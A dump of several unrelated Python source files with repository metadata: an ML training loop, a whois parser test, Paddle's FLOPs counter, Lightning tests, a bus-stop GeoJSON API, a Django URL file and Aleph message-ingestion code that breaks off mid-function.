preds = np.concatenate(preds)
targets = np.concatenate(targets)
auc = roc_auc_score(targets, preds[..., 1])
pred_y = preds.argmax(1)
precision = precision_score(targets, pred_y, zero_division=0)
recall = recall_score(targets, pred_y, zero_division=0)
f1 = f1_score(targets, pred_y, zero_division=0)
fpr, tpr, threshold = roc_curve(targets, preds[..., 1])
print('\t\taccuracy:', n_correct / n_examples)
print('\t\tauc:', auc)
print('\t\ttotal_loss:', total_loss)
if is_train:
suffix = '/train'
else:
if is_valid:
suffix = '/valid'
else:
suffix = '/test'
if log_writer:
log_writer.add_scalar('total_loss' + suffix, total_loss, global_step=step)
log_writer.add_scalar('cross_entropy' + suffix, total_cross_entropy, global_step=step)
log_writer.add_scalar('cluster_cost' + suffix, total_cluster_cost, global_step=step)
if config.class_specific:
log_writer.add_scalar('separation_cost' + suffix, total_separation_cost, global_step=step)
log_writer.add_scalar('avg_separation_cost' + suffix, total_avg_separation_cost / n_batches,
global_step=step)
log_writer.add_scalar('accuracy' + suffix, n_correct / n_examples, global_step=step)
log_writer.add_scalar('auc' + suffix, auc, global_step=step)
log_writer.add_scalar('precision' + suffix, precision, global_step=step)
log_writer.add_scalar('recall' + suffix, recall, global_step=step)
log_writer.add_scalar('f-score' + suffix, f1, global_step=step)
log_writer.add_scalar('l1' + suffix, model.last_layer.weight.norm(p=1).item(), global_step=step)
conf_plot = ConfusionMatrixDisplay(confusion_matrix=conf_matrix).plot(cmap='Blues', values_format='d')
log_writer.add_figure('confusion_matrix' + suffix, conf_plot.figure_, global_step=step, close=True)
plt.figure()
plt.title('Receiver Operating Characteristic')
plt.plot(fpr, tpr, 'b', label='AUC = %0.2f' % auc)
plt.legend(loc='lower right')
plt.plot([0, 1], [0, 1], 'r--')
plt.xlim([0, 1])
plt.ylim([0, 1])
plt.ylabel('True Positive Rate')
plt.xlabel('False Positive Rate')
log_writer.add_figure('roc' + suffix, plt.gcf(), global_step=step, close=True)
p = model.prototype_vectors.view(model.num_prototypes, -1).cpu()
with torch.no_grad():
p_avg_pair_dist = torch.mean(list_of_distances(p, p))
if log_writer:
log_writer.add_scalar('p_avg_pair_dist' + suffix, p_avg_pair_dist, global_step=step)
return auc
def train(model, dataloader, optimizer, config: Settings, log_writer: SummaryWriter = None,
step: int = 0, weighting_attention=False):
assert (optimizer is not None)
print('\ttrain')
model.train()
return _train_or_test(model=model, dataloader=dataloader, config=config, optimizer=optimizer,
log_writer=log_writer, step=step, weighting_attention=weighting_attention)
def valid(model, dataloader, config: Settings, log_writer: SummaryWriter = None, step: int = 0,
weighting_attention=False):
print('\tvalid')
model.eval()
return _train_or_test(model=model, dataloader=dataloader, config=config, optimizer=None,
log_writer=log_writer, step=step, weighting_attention=weighting_attention, is_valid=True)
def test(model, dataloader, config: Settings, log_writer: SummaryWriter = None, step: int = 0,
weighting_attention=False):
print('\ttest')
model.eval()
return _train_or_test(model=model, dataloader=dataloader, config=config, optimizer=None,
log_writer=log_writer, step=step, weighting_attention=weighting_attention)
def _freeze_layer(layer):
for p in layer.parameters():
p.requires_grad = False
def _unfreeze_layer(layer):
for p in layer.parameters():
p.requires_grad = True
def last_only(model):
_freeze_layer(model.features)
_freeze_layer(model.add_on_layers)
model.prototype_vectors.requires_grad = False
_unfreeze_layer(model.attention_V)
_unfreeze_layer(model.attention_U)
_unfreeze_layer(model.attention_weights)
_unfreeze_layer(model.last_layer)
def warm_only(model):
_unfreeze_layer(model.features)
_unfreeze_layer(model.add_on_layers)
_unfreeze_layer(model.attention_V)
_unfreeze_layer(model.attention_U)
_unfreeze_layer(model.attention_weights)
model.prototype_vectors.requires_grad = True
_unfreeze_layer(model.last_layer)
def joint(model):
_unfreeze_layer(model.features)
_unfreeze_layer(model.add_on_layers)
model.prototype_vectors.requires_grad = True
_freeze_layer(model.attention_V)
_freeze_layer(model.attention_U)
_freeze_layer(model.attention_weights)
_freeze_layer(model.last_layer)
| 39.250836 | 124 | 0.628323 |
e7e9e8e05037a0d368709d20745c3d3e79794f66
| 933 |
py
|
Python
|
test/record/parser/test_response_whois_jprs_jp_jp_property_status_suspended.py
|
huyphan/pyyawhois
|
77fb2f73a9c67989f1d41d98f37037406a69d136
|
[
"MIT"
] | null | null | null |
test/record/parser/test_response_whois_jprs_jp_jp_property_status_suspended.py
|
huyphan/pyyawhois
|
77fb2f73a9c67989f1d41d98f37037406a69d136
|
[
"MIT"
] | null | null | null |
test/record/parser/test_response_whois_jprs_jp_jp_property_status_suspended.py
|
huyphan/pyyawhois
|
77fb2f73a9c67989f1d41d98f37037406a69d136
|
[
"MIT"
] | null | null | null |
# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
# spec/fixtures/responses/whois.jprs.jp/jp/property_status_suspended
#
# and regenerate the tests with the following script
#
# $ scripts/generate_tests.py
#
from nose.tools import *
from dateutil.parser import parse as time_parse
import yawhois
class TestWhoisJprsJpJpPropertyStatusSuspended(object):
def setUp(self):
fixture_path = "spec/fixtures/responses/whois.jprs.jp/jp/property_status_suspended.txt"
host = "whois.jprs.jp"
part = yawhois.record.Part(open(fixture_path, "r").read(), host)
self.record = yawhois.record.Record(None, [part])
def test_status(self):
eq_(self.record.status, 'expired')
def test_available(self):
eq_(self.record.available, False)
def test_registered(self):
eq_(self.record.registered, True)
| 29.15625 | 95 | 0.702036 |
2c59ee67d4a8e9ae49bf7eadec2d1b1e9d1e7fce
| 10,349 |
py
|
Python
|
python/paddle/hapi/dynamic_flops.py
|
wwqgtxx/Paddle
|
109ca9d250e37e723e364366e8402c307b110169
|
[
"Apache-2.0"
] | 17,085 |
2016-11-18T06:40:52.000Z
|
2022-03-31T22:52:32.000Z
|
python/paddle/hapi/dynamic_flops.py
|
betterpig/paddle_npu
|
74ad4b6a700795d5edce8dd49d6c2df6f15e8935
|
[
"Apache-2.0"
] | 29,769 |
2016-11-18T06:35:22.000Z
|
2022-03-31T16:46:15.000Z
|
python/paddle/hapi/dynamic_flops.py
|
betterpig/paddle_npu
|
74ad4b6a700795d5edce8dd49d6c2df6f15e8935
|
[
"Apache-2.0"
] | 4,641 |
2016-11-18T07:43:33.000Z
|
2022-03-31T15:15:02.000Z
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import warnings
import paddle.nn as nn
import numpy as np
from .static_flops import static_flops, Table
__all__ = []
def flops(net, input_size, custom_ops=None, print_detail=False):
"""Print a table about the FLOPs of network.
Args:
net (paddle.nn.Layer||paddle.static.Program): The network which could be a instance of paddle.nn.Layer in
dygraph or paddle.static.Program in static graph.
input_size (list): size of input tensor. Note that the batch_size in argument 'input_size' only support 1.
custom_ops (A dict of function, optional): A dictionary which key is the class of specific operation such as
paddle.nn.Conv2D and the value is the function used to count the FLOPs of this operation. This
argument only work when argument 'net' is an instance of paddle.nn.Layer. The details could be found
in following example code. Default is None.
print_detail (bool, optional): Whether to print the detail information, like FLOPs per layer, about the net FLOPs.
Default is False.
Returns:
Int: A number about the FLOPs of total network.
Examples:
.. code-block:: python
import paddle
import paddle.nn as nn
class LeNet(nn.Layer):
def __init__(self, num_classes=10):
super(LeNet, self).__init__()
self.num_classes = num_classes
self.features = nn.Sequential(
nn.Conv2D(
1, 6, 3, stride=1, padding=1),
nn.ReLU(),
nn.MaxPool2D(2, 2),
nn.Conv2D(
6, 16, 5, stride=1, padding=0),
nn.ReLU(),
nn.MaxPool2D(2, 2))
if num_classes > 0:
self.fc = nn.Sequential(
nn.Linear(400, 120),
nn.Linear(120, 84),
nn.Linear(
84, 10))
def forward(self, inputs):
x = self.features(inputs)
if self.num_classes > 0:
x = paddle.flatten(x, 1)
x = self.fc(x)
return x
lenet = LeNet()
# m is the instance of nn.Layer, x is the intput of layer, y is the output of layer.
def count_leaky_relu(m, x, y):
x = x[0]
nelements = x.numel()
m.total_ops += int(nelements)
FLOPs = paddle.flops(lenet, [1, 1, 28, 28], custom_ops= {nn.LeakyReLU: count_leaky_relu},
print_detail=True)
print(FLOPs)
#+--------------+-----------------+-----------------+--------+--------+
#| Layer Name | Input Shape | Output Shape | Params | Flops |
#+--------------+-----------------+-----------------+--------+--------+
#| conv2d_2 | [1, 1, 28, 28] | [1, 6, 28, 28] | 60 | 47040 |
#| re_lu_2 | [1, 6, 28, 28] | [1, 6, 28, 28] | 0 | 0 |
#| max_pool2d_2 | [1, 6, 28, 28] | [1, 6, 14, 14] | 0 | 0 |
#| conv2d_3 | [1, 6, 14, 14] | [1, 16, 10, 10] | 2416 | 241600 |
#| re_lu_3 | [1, 16, 10, 10] | [1, 16, 10, 10] | 0 | 0 |
#| max_pool2d_3 | [1, 16, 10, 10] | [1, 16, 5, 5] | 0 | 0 |
#| linear_0 | [1, 400] | [1, 120] | 48120 | 48000 |
#| linear_1 | [1, 120] | [1, 84] | 10164 | 10080 |
#| linear_2 | [1, 84] | [1, 10] | 850 | 840 |
#+--------------+-----------------+-----------------+--------+--------+
#Total Flops: 347560 Total Params: 61610
"""
if isinstance(net, nn.Layer):
inputs = paddle.randn(input_size)
return dynamic_flops(
net,
inputs=inputs,
custom_ops=custom_ops,
print_detail=print_detail)
elif isinstance(net, paddle.static.Program):
return static_flops(net, print_detail=print_detail)
else:
warnings.warn(
"Your model must be an instance of paddle.nn.Layer or paddle.static.Program."
)
return -1
def count_convNd(m, x, y):
x = x[0]
kernel_ops = np.product(m.weight.shape[2:])
bias_ops = 1 if m.bias is not None else 0
total_ops = int(y.numel()) * (
x.shape[1] / m._groups * kernel_ops + bias_ops)
m.total_ops += abs(int(total_ops))
def count_leaky_relu(m, x, y):
x = x[0]
nelements = x.numel()
m.total_ops += int(nelements)
def count_bn(m, x, y):
x = x[0]
nelements = x.numel()
if not m.training:
total_ops = 2 * nelements
m.total_ops += abs(int(total_ops))
def count_linear(m, x, y):
total_mul = m.weight.shape[0]
num_elements = y.numel()
total_ops = total_mul * num_elements
m.total_ops += abs(int(total_ops))
def count_avgpool(m, x, y):
kernel_ops = 1
num_elements = y.numel()
total_ops = kernel_ops * num_elements
m.total_ops += int(total_ops)
def count_adap_avgpool(m, x, y):
kernel = np.array(x[0].shape[2:]) // np.array(y.shape[2:])
total_add = np.product(kernel)
total_div = 1
kernel_ops = total_add + total_div
num_elements = y.numel()
total_ops = kernel_ops * num_elements
m.total_ops += abs(int(total_ops))
def count_zero_ops(m, x, y):
m.total_ops += int(0)
def count_parameters(m, x, y):
total_params = 0
for p in m.parameters():
total_params += p.numel()
m.total_params[0] = abs(int(total_params))
def count_io_info(m, x, y):
m.register_buffer('input_shape', paddle.to_tensor(x[0].shape))
m.register_buffer('output_shape', paddle.to_tensor(y.shape))
register_hooks = {
nn.Conv1D: count_convNd,
nn.Conv2D: count_convNd,
nn.Conv3D: count_convNd,
nn.Conv1DTranspose: count_convNd,
nn.Conv2DTranspose: count_convNd,
nn.Conv3DTranspose: count_convNd,
nn.layer.norm.BatchNorm2D: count_bn,
nn.BatchNorm: count_bn,
nn.ReLU: count_zero_ops,
nn.ReLU6: count_zero_ops,
nn.LeakyReLU: count_leaky_relu,
nn.Linear: count_linear,
nn.Dropout: count_zero_ops,
nn.AvgPool1D: count_avgpool,
nn.AvgPool2D: count_avgpool,
nn.AvgPool3D: count_avgpool,
nn.AdaptiveAvgPool1D: count_adap_avgpool,
nn.AdaptiveAvgPool2D: count_adap_avgpool,
nn.AdaptiveAvgPool3D: count_adap_avgpool
}
def dynamic_flops(model, inputs, custom_ops=None, print_detail=False):
handler_collection = []
types_collection = set()
if custom_ops is None:
custom_ops = {}
def add_hooks(m):
if len(list(m.children())) > 0:
return
m.register_buffer('total_ops', paddle.zeros([1], dtype='int64'))
m.register_buffer('total_params', paddle.zeros([1], dtype='int64'))
m_type = type(m)
flops_fn = None
if m_type in custom_ops:
flops_fn = custom_ops[m_type]
if m_type not in types_collection:
print("Customize Function has been applied to {}".format(
m_type))
elif m_type in register_hooks:
flops_fn = register_hooks[m_type]
if m_type not in types_collection:
print("{}'s flops has been counted".format(m_type))
else:
if m_type not in types_collection:
print(
"Cannot find suitable count function for {}. Treat it as zero FLOPs.".
format(m_type))
if flops_fn is not None:
flops_handler = m.register_forward_post_hook(flops_fn)
handler_collection.append(flops_handler)
params_handler = m.register_forward_post_hook(count_parameters)
io_handler = m.register_forward_post_hook(count_io_info)
handler_collection.append(params_handler)
handler_collection.append(io_handler)
types_collection.add(m_type)
training = model.training
model.eval()
model.apply(add_hooks)
with paddle.framework.no_grad():
model(inputs)
total_ops = 0
total_params = 0
for m in model.sublayers():
if len(list(m.children())) > 0:
continue
if set(['total_ops', 'total_params', 'input_shape',
'output_shape']).issubset(set(list(m._buffers.keys()))):
total_ops += m.total_ops
total_params += m.total_params
if training:
model.train()
for handler in handler_collection:
handler.remove()
table = Table(
["Layer Name", "Input Shape", "Output Shape", "Params", "Flops"])
for n, m in model.named_sublayers():
if len(list(m.children())) > 0:
continue
if set(['total_ops', 'total_params', 'input_shape',
'output_shape']).issubset(set(list(m._buffers.keys()))):
table.add_row([
m.full_name(), list(m.input_shape.numpy()),
list(m.output_shape.numpy()), int(m.total_params),
int(m.total_ops)
])
m._buffers.pop("total_ops")
m._buffers.pop("total_params")
m._buffers.pop('input_shape')
m._buffers.pop('output_shape')
if print_detail:
table.print_table()
print('Total Flops: {} Total Params: {}'.format(
int(total_ops), int(total_params)))
return int(total_ops)
| 35.934028 | 122 | 0.555996 |
5e091d2b5ed8ce4184e6fcd07c64e73d85976f17
| 5,313 |
py
|
Python
|
tests/core/test_results.py
|
ameliatqy/pytorch-lightning
|
ca18e11f6efe822098c79e7d9124b08a55bcd908
|
[
"Apache-2.0"
] | null | null | null |
tests/core/test_results.py
|
ameliatqy/pytorch-lightning
|
ca18e11f6efe822098c79e7d9124b08a55bcd908
|
[
"Apache-2.0"
] | null | null | null |
tests/core/test_results.py
|
ameliatqy/pytorch-lightning
|
ca18e11f6efe822098c79e7d9124b08a55bcd908
|
[
"Apache-2.0"
] | null | null | null |
import sys
from pathlib import Path
import pytest
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
from pytorch_lightning import Trainer, seed_everything
from pytorch_lightning.core.step_result import Result, TrainResult, EvalResult
import tests.base.develop_utils as tutils
from tests.base import EvalModelTemplate
from tests.base.datamodules import TrialMNISTDataModule
def _setup_ddp(rank, worldsize):
import os
os.environ["MASTER_ADDR"] = "localhost"
# initialize the process group
dist.init_process_group("gloo", rank=rank, world_size=worldsize)
def _ddp_test_fn(rank, worldsize, result_cls: Result):
_setup_ddp(rank, worldsize)
tensor = torch.tensor([1.0])
res = result_cls()
res.log("test_tensor", tensor, sync_dist=True, sync_dist_op=torch.distributed.ReduceOp.SUM)
assert res["test_tensor"].item() == dist.get_world_size(), "Result-Log does not work properly with DDP and Tensors"
@pytest.mark.parametrize("result_cls", [Result, TrainResult, EvalResult])
@pytest.mark.skipif(sys.platform == "win32", reason="DDP not available on windows")
def test_result_reduce_ddp(result_cls):
"""Make sure result logging works with DDP"""
tutils.reset_seed()
tutils.set_random_master_port()
worldsize = 2
mp.spawn(_ddp_test_fn, args=(worldsize, result_cls), nprocs=worldsize)
@pytest.mark.parametrize(
"test_option,do_train,gpus",
[
pytest.param(
0, True, 0, id='full_loop'
),
pytest.param(
0, False, 0, id='test_only'
),
pytest.param(
1, False, 0, id='test_only_mismatching_tensor', marks=pytest.mark.xfail(raises=ValueError, match="Mism.*")
),
pytest.param(
2, False, 0, id='mix_of_tensor_dims'
),
pytest.param(
3, False, 0, id='string_list_predictions'
),
pytest.param(
4, False, 0, id='int_list_predictions'
),
pytest.param(
5, False, 0, id='nested_list_predictions'
),
pytest.param(
6, False, 0, id='dict_list_predictions'
),
pytest.param(
0, True, 1, id='full_loop_single_gpu', marks=pytest.mark.skipif(torch.cuda.device_count() < 1, reason="test requires single-GPU machine")
)
]
)
def test_result_obj_predictions(tmpdir, test_option, do_train, gpus):
tutils.reset_seed()
dm = TrialMNISTDataModule(tmpdir)
prediction_file = Path('predictions.pt')
model = EvalModelTemplate()
model.test_option = test_option
model.prediction_file = prediction_file.as_posix()
model.test_step = model.test_step_result_preds
model.test_step_end = None
model.test_epoch_end = None
model.test_end = None
if prediction_file.exists():
prediction_file.unlink()
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=3,
weights_summary=None,
deterministic=True,
gpus=gpus
)
# Prediction file shouldn't exist yet because we haven't done anything
assert not prediction_file.exists()
if do_train:
result = trainer.fit(model, dm)
assert result == 1
result = trainer.test(datamodule=dm)
result = result[0]
assert result['test_loss'] < 0.6
assert result['test_acc'] > 0.8
else:
result = trainer.test(model, datamodule=dm)
# check prediction file now exists and is of expected length
assert prediction_file.exists()
predictions = torch.load(prediction_file)
assert len(predictions) == len(dm.mnist_test)
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
def test_result_obj_predictions_ddp_spawn(tmpdir):
distributed_backend = 'ddp_spawn'
option = 0
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '0,1'
seed_everything(4321)
dm = TrialMNISTDataModule(tmpdir)
prediction_file = Path('predictions.pt')
model = EvalModelTemplate()
model.test_option = option
model.prediction_file = prediction_file.as_posix()
model.test_step = model.test_step_result_preds
model.test_step_end = None
model.test_epoch_end = None
model.test_end = None
prediction_files = [Path('predictions_rank_0.pt'), Path('predictions_rank_1.pt')]
for prediction_file in prediction_files:
if prediction_file.exists():
prediction_file.unlink()
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=3,
weights_summary=None,
deterministic=True,
distributed_backend=distributed_backend,
gpus=[0, 1]
)
# Prediction file shouldn't exist yet because we haven't done anything
# assert not model.prediction_file.exists()
result = trainer.fit(model, dm)
assert result == 1
result = trainer.test(datamodule=dm)
result = result[0]
assert result['test_loss'] < 0.6
assert result['test_acc'] > 0.8
dm.setup('test')
# check prediction file now exists and is of expected length
size = 0
for prediction_file in prediction_files:
assert prediction_file.exists()
predictions = torch.load(prediction_file)
size += len(predictions)
assert size == len(dm.mnist_test)
| 30.016949 | 149 | 0.675325 |
919f7c3181b654b66f6876d0e9177ea641dfb488
| 3,554 |
py
|
Python
|
api/stops.py
|
TiltShiftNL/tourbuzz-geo-api
|
133cd723e1885d763247b42876b58c58735be820
|
[
"MIT"
] | null | null | null |
api/stops.py
|
TiltShiftNL/tourbuzz-geo-api
|
133cd723e1885d763247b42876b58c58735be820
|
[
"MIT"
] | 1 |
2020-07-28T09:14:01.000Z
|
2020-07-28T10:14:55.000Z
|
api/stops.py
|
TiltShiftNL/tourbuzz-geo-api
|
133cd723e1885d763247b42876b58c58735be820
|
[
"MIT"
] | null | null | null |
import json
from .models import DbStop
from .database import SessionLocal, engine
from .settings import settings
from geoalchemy2 import func
def get_base_query():
db = SessionLocal()
return db.query(
DbStop.id,
DbStop.source_url,
DbStop.source_name,
DbStop.source_id,
DbStop.link_url,
DbStop.link_title,
DbStop.name,
DbStop.title,
DbStop.description,
DbStop.spots_text,
DbStop.spots,
DbStop.point.ST_Transform(4326).ST_AsGeoJson())
def construct_geojson(result):
feature_collection = {
"type": "FeatureCollection",
"name": "stops",
"crs": {
"type": "name",
"properties": {
"name": "urn:ogc:def:crs:OGC:1.3:CRS84"
}
},
"features": []
}
for entry in result:
out = {
"type": "Feature",
"id": entry[0],
"properties": {
"title": entry[7],
"name": entry[6],
"description": entry[8],
"spots_text": entry[9],
"spots": entry[10],
"source": {
"name": entry[2],
"url": entry[1],
"id": entry[3]
}
},
"geometry": json.loads(entry[11])
}
feature_collection["features"].append(out)
return feature_collection
def legacy():
result_set = {
"haltes": {}
}
try:
result = get_base_query().all()
except:
DbStop.__table__.create(engine)
result = get_base_query().all()
for entry in result:
point = json.loads(entry[11])
out = {
"haltenummer": entry[3],
"straat": entry[6],
"locatie": entry[8],
"capaciteit": entry[10],
"location": {
"lat": point["coordinates"][1],
"lng": point["coordinates"][0]
},
"mapsImageUrl": "https://maps.googleapis.com/maps/api/staticmap?center=" + \
str(point["coordinates"][1]) + "," + str(point["coordinates"][0]) + \
"&zoom=16&size=600x300&maptype=roadmap&markers=" + \
str(point["coordinates"][1]) + "," + str(point["coordinates"][0]) + \
"&key=" + settings.GOOGLE_MAPS_KEY,
"mapsUrl": "https://www.google.com/maps/?q=loc:" + \
str(point["coordinates"][1]) + "," + str(point["coordinates"][0]),
"beschikbaar": True,
"_origineel": {
"title": entry[7],
"Lokatie": entry[11],
"Bijzonderheden": entry[8],
"Busplaatsen": entry[9]
}
}
result_set["haltes"][entry[3]] = out
return result_set
def geojson_bbox(bounds):
bounds_parts = bounds.split(',')
result = get_base_query().filter(
func.ST_Intersects(
func.ST_MakeEnvelope(
bounds_parts[0],
bounds_parts[1],
bounds_parts[2],
bounds_parts[3],
4326
),
DbStop.point.ST_Transform(4326),
)
).all()
return construct_geojson(result)
def geojson_all():
try:
result = get_base_query().all()
except:
DbStop.__table__.create(engine)
result = get_base_query().all()
return construct_geojson(result)
| 28.206349 | 88 | 0.481711 |
c14a644baea3af34d73c8492fc38398c340e8c86
| 166 |
py
|
Python
|
info/urls.py
|
ycy-tw/python-django-stock
|
263a926ae6aa8248fd4c4e8d767c5dc9d522e4c0
|
[
"MIT"
] | 2 |
2021-04-25T07:01:01.000Z
|
2021-05-07T10:17:26.000Z
|
info/urls.py
|
ycy-tw/python-django-stock
|
263a926ae6aa8248fd4c4e8d767c5dc9d522e4c0
|
[
"MIT"
] | null | null | null |
info/urls.py
|
ycy-tw/python-django-stock
|
263a926ae6aa8248fd4c4e8d767c5dc9d522e4c0
|
[
"MIT"
] | null | null | null |
from django.urls import path, include
from .views import (
basic_variable_view,
)
urlpatterns = [
path('<int:symbol>/', basic_variable_view, name='info'),
]
| 18.444444 | 60 | 0.698795 |
72cc7e4d231809b3f0c8ae9421cd941f2c6054d5
| 15,979 |
py
|
Python
|
src/aleph/chains/common.py
|
aleph-im/py-aleph
|
a18beb8b4eba36887ca85054ed2471c3680bdfde
|
[
"MIT"
] | null | null | null |
src/aleph/chains/common.py
|
aleph-im/py-aleph
|
a18beb8b4eba36887ca85054ed2471c3680bdfde
|
[
"MIT"
] | null | null | null |
src/aleph/chains/common.py
|
aleph-im/py-aleph
|
a18beb8b4eba36887ca85054ed2471c3680bdfde
|
[
"MIT"
] | null | null | null |
import asyncio
import json
import logging
from dataclasses import asdict
from enum import IntEnum
from typing import Dict, Optional, Tuple, List
from aleph_message.models import MessageType, ItemType
from bson import ObjectId
from pymongo import UpdateOne
from aleph.config import get_config
from aleph.exceptions import (
AlephStorageException,
InvalidContent,
ContentCurrentlyUnavailable,
UnknownHashError,
InvalidMessageError,
)
from aleph.handlers.forget import handle_forget_message
from aleph.handlers.storage import handle_new_storage
from aleph.model.db_bulk_operation import DbBulkOperation
from aleph.model.filepin import PermanentPin
from aleph.model.messages import CappedMessage, Message
from aleph.model.pending import PendingMessage, PendingTX
from aleph.network import check_message as check_message_fn
from aleph.permissions import check_sender_authorization
from aleph.storage import get_json, pin_hash, add_json, get_message_content
from .tx_context import TxContext
from ..schemas.pending_messages import BasePendingMessage
from ..utils import item_type_from_hash
LOGGER = logging.getLogger("chains.common")
async def get_verification_buffer(message: BasePendingMessage) -> bytes:
"""Returns a serialized string to verify the message integrity
(this is was it signed)
"""
buffer = f"{message.chain}\n{message.sender}\n{message.type}\n{message.item_hash}"
return buffer.encode("utf-8")
async def mark_confirmed_data(chain_name, tx_hash, height):
"""Returns data required to mark a particular hash as confirmed
in underlying chain.
"""
return {
"confirmed": True,
"confirmations": [ # TODO: we should add the current one there
# and not replace it.
{"chain": chain_name, "height": height, "hash": tx_hash}
],
}
async def delayed_incoming(message, chain_name=None, tx_hash=None, height=None):
if message is None:
return
await PendingMessage.collection.insert_one(
{
"message": message,
"source": dict(
chain_name=chain_name,
tx_hash=tx_hash,
height=height,
check_message=True, # should we store this?
),
}
)
class IncomingStatus(IntEnum):
FAILED_PERMANENTLY = -1
RETRYING_LATER = 0
MESSAGE_HANDLED = 1
async def mark_message_for_retry(
message: Dict,
chain_name: Optional[str],
tx_hash: Optional[str],
height: Optional[int],
check_message: bool,
retrying: bool,
existing_id,
):
if not retrying:
await PendingMessage.collection.insert_one(
{
"message": message,
"source": dict(
chain_name=chain_name,
tx_hash=tx_hash,
height=height,
check_message=check_message, # should we store this?
),
}
)
else:
LOGGER.debug(f"Incrementing for {existing_id}")
result = await PendingMessage.collection.update_one(
filter={"_id": ObjectId(existing_id)}, update={"$inc": {"retries": 1}}
)
LOGGER.debug(f"Update result {result}")
def update_message_item_type(message_dict: Dict) -> Dict:
"""
Ensures that the item_type field of a message is present.
Sets it to the default value if the field is not specified.
"""
if "item_type" in message_dict:
return message_dict
if "item_content" in message_dict:
item_type = ItemType.inline
else:
item_type = item_type_from_hash(message_dict["item_hash"])
message_dict["item_type"] = item_type
return message_dict
async def incoming(
message: Dict,
chain_name: Optional[str] = None,
tx_hash: Optional[str] = None,
height: Optional[int] = None,
seen_ids: Optional[Dict[Tuple, int]] = None,
check_message: bool = False,
retrying: bool = False,
existing_id: Optional[ObjectId] = None,
) -> Tuple[IncomingStatus, List[DbBulkOperation]]:
"""New incoming message from underlying chain.
For regular messages it will be marked as confirmed
if existing in database, created if not.
"""
# TODO: this is a temporary fix to set the item_type of the message to the correct
# value. This should be replaced by a full use of Pydantic models.
message = update_message_item_type(message)
item_hash = message["item_hash"]
sender = message["sender"]
ids_key = (item_hash, sender, chain_name)
if chain_name and tx_hash and height and seen_ids is not None:
if ids_key in seen_ids.keys():
if height > seen_ids[ids_key]:
return IncomingStatus.MESSAGE_HANDLED, []
filters = {
"item_hash": item_hash,
"chain": message["chain"],
"sender": message["sender"],
"type": message["type"],
}
existing = await Message.collection.find_one(
filters,
projection={"confirmed": 1, "confirmations": 1, "time": 1, "signature": 1},
)
if check_message:
if existing is None or (existing["signature"] != message["signature"]):
# check/sanitize the message if needed
try:
message = await check_message_fn(
message, from_chain=(chain_name is not None)
)
except InvalidMessageError:
return IncomingStatus.FAILED_PERMANENTLY, []
if message is None:
return IncomingStatus.MESSAGE_HANDLED, []
if retrying:
LOGGER.debug("(Re)trying %s." % item_hash)
else:
LOGGER.info("Incoming %s." % item_hash)
# we set the incoming chain as default for signature
message["chain"] = message.get("chain", chain_name)
# if existing is None:
# # TODO: verify if search key is ok. do we need an unique key for messages?
# existing = await Message.collection.find_one(
# filters, projection={'confirmed': 1, 'confirmations': 1, 'time': 1})
if chain_name and tx_hash and height:
# We are getting a confirmation here
new_values = await mark_confirmed_data(chain_name, tx_hash, height)
updates = {
"$set": {
"confirmed": True,
},
"$min": {"time": message["time"]},
"$addToSet": {"confirmations": new_values["confirmations"][0]},
}
else:
updates = {
"$max": {
"confirmed": False,
},
"$min": {"time": message["time"]},
}
# new_values = {'confirmed': False} # this should be our default.
should_commit = False
if existing:
if seen_ids is not None and height is not None:
if ids_key in seen_ids.keys():
if height > seen_ids[ids_key]:
return IncomingStatus.MESSAGE_HANDLED, []
else:
seen_ids[ids_key] = height
else:
seen_ids[ids_key] = height
# THIS CODE SHOULD BE HERE...
# But, if a race condition appeared, we might have the message twice.
# if (existing['confirmed'] and
# chain_name in [c['chain'] for c in existing['confirmations']]):
# return
LOGGER.debug("Updating %s." % item_hash)
if chain_name and tx_hash and height:
# we need to update messages adding the confirmation
# await Message.collection.update_many(filters, updates)
should_commit = True
else:
# if not (chain_name and tx_hash and height):
# new_values = {'confirmed': False} # this should be our default.
try:
content = await get_message_content(message)
except InvalidContent:
LOGGER.warning("Can't get content of object %r, won't retry." % item_hash)
return IncomingStatus.FAILED_PERMANENTLY, []
except (ContentCurrentlyUnavailable, Exception) as e:
if not isinstance(e, ContentCurrentlyUnavailable):
LOGGER.exception("Can't get content of object %r" % item_hash)
await mark_message_for_retry(
message=message,
chain_name=chain_name,
tx_hash=tx_hash,
height=height,
check_message=check_message,
retrying=retrying,
existing_id=existing_id,
)
return IncomingStatus.RETRYING_LATER, []
json_content = content.value
if json_content.get("address", None) is None:
json_content["address"] = message["sender"]
if json_content.get("time", None) is None:
json_content["time"] = message["time"]
# warning: those handlers can modify message and content in place
# and return a status. None has to be retried, -1 is discarded, True is
# handled and kept.
# TODO: change this, it's messy.
try:
if message["type"] == MessageType.store:
handling_result = await handle_new_storage(message, json_content)
elif message["type"] == MessageType.forget:
# Handling it here means that there we ensure that the message
# has been forgotten before it is saved on the node.
# We may want the opposite instead: ensure that the message has
# been saved before it is forgotten.
handling_result = await handle_forget_message(message, json_content)
else:
handling_result = True
except UnknownHashError:
LOGGER.warning(f"Invalid IPFS hash for message {item_hash}, won't retry.")
return IncomingStatus.FAILED_PERMANENTLY, []
except Exception:
LOGGER.exception("Error using the message type handler")
handling_result = None
if handling_result is None:
LOGGER.debug("Message type handler has failed, retrying later.")
await mark_message_for_retry(
message=message,
chain_name=chain_name,
tx_hash=tx_hash,
height=height,
check_message=check_message,
retrying=retrying,
existing_id=existing_id,
)
return IncomingStatus.RETRYING_LATER, []
if not handling_result:
LOGGER.warning(
"Message type handler has failed permanently for "
"%r, won't retry." % item_hash
)
return IncomingStatus.FAILED_PERMANENTLY, []
if not await check_sender_authorization(message, json_content):
LOGGER.warning("Invalid sender for %s" % item_hash)
return IncomingStatus.MESSAGE_HANDLED, []
if seen_ids is not None and height is not None:
if ids_key in seen_ids.keys():
if height > seen_ids[ids_key]:
